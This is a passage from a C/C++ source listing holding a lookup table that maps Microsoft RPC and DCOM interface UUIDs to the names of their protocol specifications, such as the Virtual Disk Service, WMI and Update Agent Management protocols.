Terminal Server Runtime Interface" }, 674 | { L"5CA4A760-EBB1-11CF-8611-00A0245420ED", L"[MS-TSTS]: Terminal Services Terminal Server Runtime Interface" }, 675 | { L"BDE95FDF-EEE0-45DE-9E12-E5A61CD0D4FE", L"[MS-TSTS]: Terminal Services Terminal Server Runtime Interface" }, 676 | { L"484809D6-4239-471B-B5BC-61DF8C23AC48", L"[MS-TSTS]: Terminal Services Terminal Server Runtime Interface" }, 677 | { L"88143FD0-C28D-4B2B-8FEF-8D882F6A9390", L"[MS-TSTS]: Terminal Services Terminal Server Runtime Interface" }, 678 | { L"1257B580-CE2F-4109-82D6-A9459D0BF6BC", L"[MS-TSTS]: Terminal Services Terminal Server Runtime Interface" }, 679 | { L"53B46B02-C73B-4A3E-8DEE-B16B80672FC0", L"[MS-TSTS]: Terminal Services Terminal Server Runtime Interface" }, 680 | { L"DDE02280-12B3-4E0B-937B-6747F6ACB286", L"[MS-UAMG]: Update Agent Management Protocol" }, 681 | { L"112EDA6B-95B3-476F-9D90-AEE82C6B8181", L"[MS-UAMG]: Update Agent Management Protocol" }, 682 | { L"144FE9B0-D23D-4A8B-8634-FB4457533B7A", L"[MS-UAMG]: Update Agent Management Protocol" }, 683 | { L"70CF5C82-8642-42BB-9DBC-0CFD263C6C4F", L"[MS-UAMG]: Update Agent Management Protocol" }, 684 | { L"49EBD502-4A96-41BD-9E3E-4C5057F4250C", L"[MS-UAMG]: Update Agent Management Protocol" }, 685 | { L"7C907864-346C-4AEB-8F3F-57DA289F969F", L"[MS-UAMG]: Update Agent Management Protocol" }, 686 | { L"46297823-9940-4C09-AED9-CD3EA6D05968", L"[MS-UAMG]: Update Agent Management Protocol" }, 687 | { L"4CBDCB2D-1589-4BEB-BD1C-3E582FF0ADD0", L"[MS-UAMG]: Update Agent Management Protocol" }, 688 | { L"8F45ABF1-F9AE-4B95-A933-F0F66E5056EA", L"[MS-UAMG]: Update Agent Management Protocol" }, 689 | { L"6A92B07A-D821-4682-B423-5C805022CC4D", L"[MS-UAMG]: Update Agent Management Protocol" }, 690 | { L"54A2CB2D-9A0C-48B6-8A50-9ABB69EE2D02", L"[MS-UAMG]: Update Agent Management Protocol" }, 691 | { L"0D521700-A372-4BEF-828B-3D00C10ADEBD", L"[MS-UAMG]: Update Agent Management Protocol" }, 692 | { L"C2BFB780-4539-4132-AB8C-0A8772013AB6", L"[MS-UAMG]: Update Agent Management Protocol" }, 693 | { L"1518B460-6518-4172-940F-C75883B24CEB", L"[MS-UAMG]: Update Agent Management Protocol" }, 694 | { L"81DDC1B8-9D35-47A6-B471-5B80F519223B", L"[MS-UAMG]: Update Agent Management Protocol" }, 695 | { L"BC5513C8-B3B8-4BF7-A4D4-361C0D8C88BA", L"[MS-UAMG]: Update Agent Management Protocol" }, 696 | { L"C1C2F21A-D2F4-4902-B5C6-8A081C19A890", L"[MS-UAMG]: Update Agent Management Protocol" }, 697 | { L"07F7438C-7709-4CA5-B518-91279288134E", L"[MS-UAMG]: Update Agent Management Protocol" }, 698 | { L"C97AD11B-F257-420B-9D9F-377F733F6F68", L"[MS-UAMG]: Update Agent Management Protocol" }, 699 | { L"3A56BFB8-576C-43F7-9335-FE4838FD7E37", L"[MS-UAMG]: Update Agent Management Protocol" }, 700 | { L"615C4269-7A48-43BD-96B7-BF6CA27D6C3E", L"[MS-UAMG]: Update Agent Management Protocol" }, 701 | { L"004C6A2B-0C19-4C69-9F5C-A269B2560DB9", L"[MS-UAMG]: Update Agent Management Protocol" }, 702 | { L"7366EA16-7A1A-4EA2-B042-973D3E9CD99B", L"[MS-UAMG]: Update Agent Management Protocol" }, 703 | { L"A376DD5E-09D4-427F-AF7C-FED5B6E1C1D6", L"[MS-UAMG]: Update Agent Management Protocol" }, 704 | { L"23857E3C-02BA-44A3-9423-B1C900805F37", L"[MS-UAMG]: Update Agent Management Protocol" }, 705 | { L"B383CD1A-5CE9-4504-9F63-764B1236F191", L"[MS-UAMG]: Update Agent Management Protocol" }, 706 | { L"76B3B17E-AED6-4DA5-85F0-83587F81ABE3", L"[MS-UAMG]: Update Agent Management Protocol" }, 707 | { L"0BB8531D-7E8D-424F-986C-A0B8F60A3E7B", L"[MS-UAMG]: Update Agent Management Protocol" }, 708 | { L"91CAF7B0-EB23-49ED-9937-C52D817F46F7", L"[MS-UAMG]: Update Agent Management Protocol" }, 709 | { L"673425BF-C082-4C7C-BDFD-569464B8E0CE", L"[MS-UAMG]: Update Agent Management Protocol" }, 710 | { L"EFF90582-2DDC-480F-A06D-60F3FBC362C3", L"[MS-UAMG]: Update Agent Management Protocol" }, 711 | { L"D9A59339-E245-4DBD-9686-4D5763E39624", L"[MS-UAMG]: Update Agent Management Protocol" }, 712 | { L"9B0353AA-0E52-44FF-B8B0-1F7FA0437F88", L"[MS-UAMG]: Update Agent Management Protocol" }, 713 | { L"503626A3-8E14-4729-9355-0FE664BD2321", L"[MS-UAMG]: Update Agent Management Protocol" }, 714 | { L"85713FA1-7796-4FA2-BE3B-E2D6124DD373", L"[MS-UAMG]: Update Agent Management Protocol" }, 715 | { L"816858A4-260D-4260-933A-2585F1ABC76B", L"[MS-UAMG]: Update Agent Management Protocol" }, 716 | { L"27E94B0D-5139-49A2-9A61-93522DC54652", L"[MS-UAMG]: Update Agent Management Protocol" }, 717 | { L"E7A4D634-7942-4DD9-A111-82228BA33901", L"[MS-UAMG]: Update Agent Management Protocol" }, 718 | { L"D40CFF62-E08C-4498-941A-01E25F0FD33C", L"[MS-UAMG]: Update Agent Management Protocol" }, 719 | { L"ED8BFE40-A60B-42EA-9652-817DFCFA23EC", L"[MS-UAMG]: Update Agent Management Protocol" }, 720 | { L"A7F04F3C-A290-435B-AADF-A116C3357A5C", L"[MS-UAMG]: Update Agent Management Protocol" }, 721 | { L"4A2F5C31-CFD9-410E-B7FB-29A653973A0F", L"[MS-UAMG]: Update Agent Management Protocol" }, 722 | { L"BE56A644-AF0E-4E0E-A311-C1D8E695CBFF", L"[MS-UAMG]: Update Agent Management Protocol" }, 723 | { L"918EFD1E-B5D8-4C90-8540-AEB9BDC56F9D", L"[MS-UAMG]: Update Agent Management Protocol" }, 724 | { L"04C6895D-EAF2-4034-97F3-311DE9BE413A", L"[MS-UAMG]: Update Agent Management Protocol" }, 725 | { L"15FC031C-0652-4306-B2C3-F558B8F837E2", L"[MS-VDS]: Virtual Disk Service (VDS) Protocol" }, 726 | { L"4DBCEE9A-6343-4651-B85F-5E75D74D983C", L"[MS-VDS]: Virtual Disk Service (VDS) Protocol" }, 727 | { L"1E062B84-E5E6-4B4B-8A25-67B81E8F13E8", L"[MS-VDS]: Virtual Disk Service (VDS) Protocol" }, 728 | { L"2ABD757F-2851-4997-9A13-47D2A885D6CA", L"[MS-VDS]: Virtual Disk Service (VDS) Protocol" }, 729 | { L"9CBE50CA-F2D2-4BF4-ACE1-96896B729625", L"[MS-VDS]: Virtual Disk Service (VDS) Protocol" }, 730 | { L"4DAA0135-E1D1-40F1-AAA5-3CC1E53221C3", L"[MS-VDS]: Virtual Disk Service (VDS) Protocol" }, 731 | { L"3858C0D5-0F35-4BF5-9714-69874963BC36", L"[MS-VDS]: Virtual Disk Service (VDS) Protocol" }, 732 | { L"40F73C8B-687D-4A13-8D96-3D7F2E683936", L"[MS-VDS]: Virtual Disk Service (VDS) Protocol" }, 733 | { L"8F4B2F5D-EC15-4357-992F-473EF10975B9", L"[MS-VDS]: Virtual Disk Service (VDS) Protocol" }, 734 | { L"FC5D23E8-A88B-41A5-8DE0-2D2F73C5A630", L"[MS-VDS]: Virtual Disk Service (VDS) Protocol" }, 735 | { L"B07FEDD4-1682-4440-9189-A39B55194DC5", L"[MS-VDS]: Virtual Disk Service (VDS) Protocol" }, 736 | { L"72AE6713-DCBB-4A03-B36B-371F6AC6B53D", L"[MS-VDS]: Virtual Disk Service (VDS) Protocol" }, 737 | { L"B6B22DA8-F903-4BE7-B492-C09D875AC9DA", L"[MS-VDS]: Virtual Disk Service (VDS) Protocol" }, 738 | { L"538684E0-BA3D-4BC0-ACA9-164AFF85C2A9", L"[MS-VDS]: Virtual Disk Service (VDS) Protocol" }, 739 | { L"75C8F324-F715-4FE3-A28E-F9011B61A4A1", L"[MS-VDS]: Virtual Disk Service (VDS) Protocol" }, 740 | { L"90681B1D-6A7F-48E8-9061-31B7AA125322", L"[MS-VDS]: Virtual Disk Service (VDS) Protocol" }, 741 | { L"9882F547-CFC3-420B-9750-00DFBEC50662", L"[MS-VDS]: Virtual Disk Service (VDS) Protocol" }, 742 | { L"83BFB87F-43FB-4903-BAA6-127F01029EEC", L"[MS-VDS]: Virtual Disk Service (VDS) Protocol" }, 743 | { L"EE2D5DED-6236-4169-931D-B9778CE03DC6", L"[MS-VDS]: Virtual Disk Service (VDS) Protocol" }, 744 | { L"9723F420-9355-42DE-AB66-E31BB15BEEAC", L"[MS-VDS]: Virtual Disk Service (VDS) Protocol" }, 745 | { L"4AFC3636-DB01-4052-80C3-03BBCB8D3C69", L"[MS-VDS]: Virtual Disk Service (VDS) Protocol" }, 746 | { L"D99BDAAE-B13A-4178-9FDB-E27F16B4603E", L"[MS-VDS]: Virtual Disk Service (VDS) Protocol" }, 747 | { L"D68168C9-82A2-4F85-B6E9-74707C49A58F", L"[MS-VDS]: Virtual Disk Service (VDS) Protocol" }, 748 | { L"13B50BFF-290A-47DD-8558-B7C58DB1A71A", L"[MS-VDS]: Virtual Disk Service (VDS) Protocol" }, 749 | { L"6E6F6B40-977C-4069-BDDD-AC710059F8C0", L"[MS-VDS]: Virtual Disk Service (VDS) Protocol" }, 750 | { L"9AA58360-CE33-4F92-B658-ED24B14425B8", L"[MS-VDS]: Virtual Disk Service (VDS) Protocol" }, 751 | { L"E0393303-90D4-4A97-AB71-E9B671EE2729", L"[MS-VDS]: Virtual Disk Service (VDS) Protocol" }, 752 | { L"07E5C822-F00C-47A1-8FCE-B244DA56FD06", L"[MS-VDS]: Virtual Disk Service (VDS) Protocol" }, 753 | { L"8326CD1D-CF59-4936-B786-5EFC08798E25", L"[MS-VDS]: Virtual Disk Service (VDS) Protocol" }, 754 | { L"1BE2275A-B315-4F70-9E44-879B3A2A53F2", L"[MS-VDS]: Virtual Disk Service (VDS) Protocol" }, 755 | { L"0316560B-5DB4-4ED9-BBB5-213436DDC0D9", L"[MS-VDS]: Virtual Disk Service (VDS) Protocol" }, 756 | { L"14FBE036-3ED7-4E10-90E9-A5FF991AFF01", L"[MS-VDS]: Virtual Disk Service (VDS) Protocol" }, 757 | { L"3B69D7F5-9D94-4648-91CA-79939BA263BF", L"[MS-VDS]: Virtual Disk Service (VDS) Protocol" }, 758 | { L"D5D23B6D-5A55-4492-9889-397A3C2D2DBC", L"[MS-VDS]: Virtual Disk Service (VDS) Protocol" }, 759 | { L"88306BB2-E71F-478C-86A2-79DA200A0F11", L"[MS-VDS]: Virtual Disk Service (VDS) Protocol" }, 760 | { L"118610B7-8D94-4030-B5B8-500889788E4E", L"[MS-VDS]: Virtual Disk Service (VDS) Protocol" }, 761 | { L"0AC13689-3134-47C6-A17C-4669216801BE", L"[MS-VDS]: Virtual Disk Service (VDS) Protocol" }, 762 | { L"0818A8EF-9BA9-40D8-A6F9-E22833CC771E", L"[MS-VDS]: Virtual Disk Service (VDS) Protocol" }, 763 | { L"6788FAF9-214E-4B85-BA59-266953616E09", L"[MS-VDS]: Virtual Disk Service (VDS) Protocol" }, 764 | { L"B481498C-8354-45F9-84A0-0BDD2832A91F", L"[MS-VDS]: Virtual Disk Service (VDS) Protocol" }, 765 | { L"10C5E575-7984-4E81-A56B-431F5F92AE42", L"[MS-VDS]: Virtual Disk Service (VDS) Protocol" }, 766 | { L"38A0A9AB-7CC8-4693-AC07-1F28BD03C3DA", L"[MS-VDS]: Virtual Disk Service (VDS) Protocol" }, 767 | { L"8FB6D884-2388-11D0-8C35-00C04FDA2795", L"[MS-W32T]: W32Time Remote Protocol" }, 768 | { L"5422FD3A-D4B8-4CEF-A12E-E87D4CA22E90", L"[MS-WCCE]: Windows Client Certificate Enrollment Protocol" }, 769 | { L"D99E6E70-FC88-11D0-B498-00A0C90312F3", L"[MS-WCCE]: Windows Client Certificate Enrollment Protocol" }, 770 | { L"1A927394-352E-4553-AE3F-7CF4AAFCA620", L"[MS-WDSC]: Windows Deployment Services Control Protocol" }, 771 | { L"6BFFD098-A112-3610-9833-46C3F87E345A", L"[MS-WKST]: Workstation Service Remote Protocol" }, 772 | { L"F1E9C5B2-F59B-11D2-B362-00105A1F8177", L"[MS-WMI]: Windows Management Instrumentation Remote Protocol" }, 773 | { L"423EC01E-2E35-11D2-B604-00104B703EFD", L"[MS-WMI]: Windows Management Instrumentation Remote Protocol" }, 774 | { L"9556DC99-828C-11CF-A37E-00AA003240C7", L"[MS-WMI]: Windows Management Instrumentation Remote Protocol" }, 775 | { L"F309AD18-D86A-11D0-A075-00C04FB68820", L"[MS-WMI]: Windows Management Instrumentation Remote Protocol" }, 776 | { L"9A653086-174F-11D2-B5F9-00104B703EFD", L"[MS-WMI]: Windows Management Instrumentation Remote Protocol" }, 777 | { L"D4781CD6-E5D3-44DF-AD94-930EFE48A887", L"[MS-WMI]: Windows Management Instrumentation Remote Protocol" }, 778 | { L"44ACA674-E8FC-11D0-A07C-00C04FB68820", L"[MS-WMI]: Windows Management Instrumentation Remote Protocol" }, 779 | { L"541679AB-2E5F-11D3-B34E-00104BCC4B4A", L"[MS-WMI]: Windows Management Instrumentation Remote Protocol" }, 780 | { L"027947E1-D731-11CE-A357-000000000001", L"[MS-WMI]: Windows Management Instrumentation Remote Protocol" }, 781 | { L"A359DEC5-E813-4834-8A2A-BA7F1D777D76", L"[MS-WMI]: Windows Management Instrumentation Remote Protocol" }, 782 | { L"C49E32C6-BC8B-11D2-85D4-00105A1F8304", L"[MS-WMI]: Windows Management Instrumentation Remote Protocol" }, 783 | { L"C49E32C7-BC8B-11D2-85D4-00105A1F8304", L"[MS-WMI]: Windows Management Instrumentation Remote Protocol" }, 784 | { L"2C9273E0-1DC3-11D3-B364-00105A1F8177", L"[MS-WMI]: Windows Management Instrumentation Remote Protocol" }, 785 | { L"7C857801-7381-11CF-884D-00AA004B2E24", L"[MS-WMI]: Windows Management Instrumentation Remote Protocol" }, 786 | { L"DC12A681-737F-11CF-884D-00AA004B2E24", L"[MS-WMI]: Windows Management Instrumentation Remote Protocol" }, 787 | { L"8BC3F05E-D86B-11D0-A075-00C04FB68820", L"[MS-WMI]: Windows Management Instrumentation Remote Protocol" }, 788 | { L"44ACA675-E8FC-11D0-A07C-00C04FB68820", L"[MS-WMI]: Windows Management Instrumentation Remote Protocol" }, 789 | { L"1C1C45EE-4395-11D2-B60B-00104B703EFD", L"[MS-WMI]: Windows Management Instrumentation Remote Protocol" }, 790 | { L"674B6698-EE92-11D0-AD71-00C04FD8FDFF", L"[MS-WMI]: Windows Management Instrumentation Remote Protocol" }, 791 | { L"FC910418-55CA-45EF-B264-83D4CE7D30E0", L"[MS-WSRM]: Windows System Resource Manager (WSRM) Protocol" }, 792 | { L"C5CEBEE2-9DF5-4CDD-A08C-C2471BC144B4", L"[MS-WSRM]: Windows System Resource Manager (WSRM) Protocol" }, 793 | { L"F31931A9-832D-481C-9503-887A0E6A79F0", L"[MS-WSRM]: Windows System Resource Manager (WSRM) Protocol" }, 794 | { L"21546AE8-4DA5-445E-987F-627FEA39C5E8", L"[MS-WSRM]: Windows System Resource Manager (WSRM) Protocol" }, 795 | { L"BC681469-9DD9-4BF4-9B3D-709F69EFE431", L"[MS-WSRM]: Windows System Resource Manager (WSRM) Protocol" }, 796 | { L"4F7CA01C-A9E5-45B6-B142-2332A1339C1D", L"[MS-WSRM]: Windows System Resource Manager (WSRM) Protocol" }, 797 | { L"2A3EB639-D134-422D-90D8-AAA1B5216202", L"[MS-WSRM]: Windows System Resource Manager (WSRM) Protocol" }, 798 | { L"59602EB6-57B0-4FD8-AA4B-EBF06971FE15", L"[MS-WSRM]: Windows System Resource Manager (WSRM) Protocol" }, 799 | { L"481E06CF-AB04-4498-8FFE-124A0A34296D", L"[MS-WSRM]: Windows System Resource Manager (WSRM) Protocol" }, 800 | { L"E8BCFFAC-B864-4574-B2E8-F1FB21DFDC18", L"[MS-WSRM]: Windows System Resource Manager (WSRM) Protocol" }, 801 | { L"943991A5-B3FE-41FA-9696-7F7B656EE34B", L"[MS-WSRM]: Windows System Resource Manager (WSRM) Protocol" }, 802 | { L"BBA9CB76-EB0C-462C-AA1B-5D8C34415701", L"[MS-ADTS]: Active Directory Technical Specification" }, 803 | { L"906B0CE0-C70B-1067-B317-00DD010662DA", L"[MS-CMPO]: MSDTC Connection Manager:" }, 804 | { L"E3514235-4B06-11D1-AB04-00C04FC2DCD2", L"[MS-DRSR]: Directory Replication Service (DRS) Remote Protocol" }, 805 | { L"F6BEAFF7-1E19-4FBB-9F8F-B89E2018337C", L"[MS-EVEN6]: EventLog Remoting Protocol" }, 806 | { L"D049B186-814F-11D1-9A3C-00C04FC9B232", L"[MS-FRS1]: File Replication Service Protocol" }, 807 | { L"F5CC59B4-4264-101A-8C59-08002B2F8426", L"[MS-FRS1]: File Replication Service Protocol" }, 808 | { L"5A7B91F8-FF00-11D0-A9B2-00C04FB6E6FC", L"[MS-MSRP]: Messenger Service Remote Protocol" }, 809 | { L"F5CC5A18-4264-101A-8C59-08002B2F8426", L"[MS-NSPI]: Name Service Provider Interface (NSPI) Protocol" }, 810 | { L"E33C0CC4-0482-101A-BC0C-02608C6BA218", L"[MS-RPCL]: Remote Procedure Call Location Services Extensions" }, 811 | { L"AFA8BD80-7D8A-11C9-BEF4-08002B102989", L"[MS-RPCE]: Remote Management Interface" }, 812 | { L"00000134-0000-0000-C000-000000000046", L"[MS-DCOM]: Distributed Component Object Model (DCOM)" }, 813 | { L"18F70770-8E64-11CF-9AF1-0020AF6E72F4", L"[MS-DCOM]: Distributed Component Object Model (DCOM)" }, 814 | { L"958F92D8-DA20-467A-BBE3-65E7E9B4EDCF", L"[MS-TSGU]: Terminal Services Gateway Server Management Interface" }, 815 | { L"6050B110-CE87-4126-A114-50AEFCFC95F8", L"[MS-DCOM]: Distributed Component Object Model (DCOM)" }, 816 | { L"1544F5E0-613C-11D1-93DF-00C04FD7BD09", L"[MS-OXABREF]: Address Book Name Service Provider Interface (NSPI) Referral Protocol" }, 817 | { L"A4F1DB00-CA47-1067-B31F-00DD010662DA", L"[MS-OXCRPC]: Wire Format Protocol" }, 818 | { L"5261574A-4572-206E-B268-6B199213B4E4", L"[MS-OXCRPC]: Wire Format Protocol" } 819 | }; --------------------------------------------------------------------------------